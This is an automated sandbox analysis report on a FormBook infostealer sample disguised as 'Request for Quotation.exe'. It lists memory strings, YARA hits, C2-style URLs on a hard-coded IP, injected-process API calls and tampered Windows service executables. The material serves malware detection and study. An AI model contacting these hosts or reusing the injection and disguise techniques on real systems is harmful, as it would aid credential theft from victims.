          Source: Request for Quotation.exe, 00000000.00000003.1768862555.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759829685.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1767780343.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/1
          Source: Request for Quotation.exe, 00000000.00000003.1739856220.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1759386922.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1748580757.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744146667.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1758403499.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1747429848.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741441665.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1744762476.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1757640309.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741023686.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746039694.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740158447.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1742733827.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740677014.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746541463.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/miswwsapbqmsir&&$
          Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
          Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Binary is likely a compiled AutoIt script file
          Source: Request for Quotation.exe, 00000000.00000000.1703958435.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0a96a4c9-2
          Source: Request for Quotation.exe, 00000000.00000000.1703958435.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_cb321cf7-4
          Source: Request for Quotation.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1657f8ed-e
          Source: Request for Quotation.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_1737610c-4
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Request for Quotation.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0042CA93 NtClose,19_2_0042CA93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035735C0 NtCreateMutant,LdrInitializeThunk,19_2_035735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572B60 NtClose,LdrInitializeThunk,19_2_03572B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,19_2_03572DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03574340 NtSetContextThread,19_2_03574340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573010 NtOpenDirectoryObject,19_2_03573010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573090 NtSetValueKey,19_2_03573090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03574650 NtSuspendThread,19_2_03574650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572BF0 NtAllocateVirtualMemory,19_2_03572BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572BE0 NtQueryValueKey,19_2_03572BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572B80 NtQueryInformationFile,19_2_03572B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572BA0 NtEnumerateValueKey,19_2_03572BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572AD0 NtReadFile,19_2_03572AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572AF0 NtWriteFile,19_2_03572AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572AB0 NtWaitForSingleObject,19_2_03572AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035739B0 NtGetContextThread,19_2_035739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572F60 NtCreateProcessEx,19_2_03572F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572F30 NtCreateSection,19_2_03572F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572FE0 NtCreateFile,19_2_03572FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572F90 NtProtectVirtualMemory,19_2_03572F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572FB0 NtResumeThread,19_2_03572FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572FA0 NtQuerySection,19_2_03572FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572E30 NtWriteVirtualMemory,19_2_03572E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572EE0 NtQueueApcThread,19_2_03572EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572E80 NtReadVirtualMemory,19_2_03572E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572EA0 NtAdjustPrivilegesToken,19_2_03572EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573D70 NtOpenThread,19_2_03573D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572D10 NtMapViewOfSection,19_2_03572D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573D10 NtOpenProcessToken,19_2_03573D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572D00 NtSetInformationFile,19_2_03572D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572D30 NtUnmapViewOfSection,19_2_03572D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572DD0 NtDelayExecution,19_2_03572DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572DB0 NtEnumerateKey,19_2_03572DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572C70 NtFreeVirtualMemory,19_2_03572C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572C60 NtCreateKey,19_2_03572C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572C00 NtQueryInformationProcess,19_2_03572C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572CC0 NtQueryVirtualMemory,19_2_03572CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572CF0 NtOpenProcess,19_2_03572CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572CA0 NtQueryInformationToken,19_2_03572CA0
          Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\398ce0ec3b45a4be.binJump to behavior
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C37C006_2_00C37C00
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C5A8106_2_00C5A810
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C379F06_2_00C379F0
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C62D406_2_00C62D40
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C592A06_2_00C592A0
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C5EEB06_2_00C5EEB0
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C593B06_2_00C593B0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009BA81010_2_009BA810
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_00997C0010_2_00997C00
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009979F010_2_009979F0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009C2D4010_2_009C2D40
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009BEEB010_2_009BEEB0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009B92A010_2_009B92A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009B93B010_2_009B93B0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD7C0011_2_00CD7C00
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CFA81011_2_00CFA810
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD79F011_2_00CD79F0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00D02D4011_2_00D02D40
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CF92A011_2_00CF92A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CFEEB011_2_00CFEEB0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CF93B011_2_00CF93B0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_0056A81013_2_0056A810
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00547C0013_2_00547C00
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00572D4013_2_00572D40
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_005479F013_2_005479F0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_0056EEB013_2_0056EEB0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_005692A013_2_005692A0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_005693B013_2_005693B0
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A515C14_2_007A515C
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007651EE14_2_007651EE
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A39A314_2_007A39A3
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00766EAF14_2_00766EAF
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079598014_2_00795980
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079D58014_2_0079D580
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079C7F014_2_0079C7F0
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00767F8014_2_00767F80
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079378014_2_00793780
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_0079A81018_2_0079A810
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_00777C0018_2_00777C00
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007A2D4018_2_007A2D40
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007779F018_2_007779F0
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_0079EEB018_2_0079EEB0
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007992A018_2_007992A0
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007993B018_2_007993B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00401ACB19_2_00401ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0042F0B319_2_0042F0B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_004101D319_2_004101D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_004032F019_2_004032F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402A9019_2_00402A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040E3D319_2_0040E3D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_004103F319_2_004103F3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00416B8E19_2_00416B8E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00416B9319_2_00416B93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00401C4019_2_00401C40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00401C3A19_2_00401C3A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040E51C19_2_0040E51C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040E52319_2_0040E523
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402E4919_2_00402E49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402E5019_2_00402E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402F1919_2_00402F19
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040272019_2_00402720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FA35219_2_035FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352D34C19_2_0352D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F132D19_2_035F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036003E619_2_036003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F019_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0358739A19_2_0358739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E027419_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C019_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A019_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360B16B19_2_0360B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F17219_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0357516C19_2_0357516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA11819_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353010019_2_03530100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F81CC19_2_035F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036001AA19_2_036001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354B1B019_2_0354B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF0CC19_2_035EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C019_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F70E919_2_035F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FF0E019_2_035FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356475019_2_03564750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354077019_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353C7C019_2_0353C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FF7B019_2_035FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F16CC19_2_035F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355C6E019_2_0355C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F757119_2_035F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354053519_2_03540535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DD5B019_2_035DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360059119_2_03600591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F244619_2_035F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353146019_2_03531460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FF43F19_2_035FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EE4F619_2_035EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FAB4019_2_035FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFB7619_2_035FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F6BD719_2_035F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0357DBF919_2_0357DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355FB8019_2_0355FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFA4919_2_035FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F7A4619_2_035F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B3A6C19_2_035B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EDAC619_2_035EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353EA8019_2_0353EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DDAAC19_2_035DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03585AA019_2_03585AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354995019_2_03549950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B95019_2_0355B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355696219_2_03556962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360A9A619_2_0360A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035429A019_2_035429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354284019_2_03542840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354A84019_2_0354A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AD80019_2_035AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356E8F019_2_0356E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035438E019_2_035438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035268B819_2_035268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B4F4019_2_035B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFF0919_2_035FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03560F3019_2_03560F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03582F2819_2_03582F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03532FC819_2_03532FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541F9219_2_03541F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFFB119_2_035FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540E5919_2_03540E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FEE2619_2_035FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FEEDB19_2_035FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03552E9019_2_03552E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FCE9319_2_035FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03549EB019_2_03549EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F1D5A19_2_035F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03543D4019_2_03543D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F7D7319_2_035F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354AD0019_2_0354AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355FDC019_2_0355FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353ADE019_2_0353ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03558DBF19_2_03558DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540C0019_2_03540C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B9C3219_2_035B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03530CF219_2_03530CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFCF219_2_035FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0CB519_2_035E0CB5
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D4A81020_2_00D4A810
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D27C0020_2_00D27C00
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D279F020_2_00D279F0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D52D4020_2_00D52D40
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D4EEB020_2_00D4EEB0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D492A020_2_00D492A0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D493B020_2_00D493B0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 85 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 87 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 253 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 36 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
          Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
          Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
          Source: Request for Quotation.exe, 00000000.00000003.1706894621.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000000.00000003.1711430159.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000000.00000003.1732564274.00000000040F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs Request for Quotation.exe
          Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
          Source: Request for Quotation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Request for Quotation.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
